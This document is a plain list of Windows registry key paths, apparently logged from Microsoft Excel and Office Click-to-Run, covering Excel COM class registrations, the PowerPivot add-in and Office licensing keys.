HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid\(Default)
HKEY_CLASSES_ROOT\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\OverrideDefaultDisable
HKEY_CLASSES_ROOT\Excel.Chart.8\protocol\StdFileEditing\server
HKEY_CLASSES_ROOT\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OPEN
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\Resiliency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\DESKTOP-SUAFK0F
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Registration\DESKTOP-SUAFK0F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData\excel.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Elevation
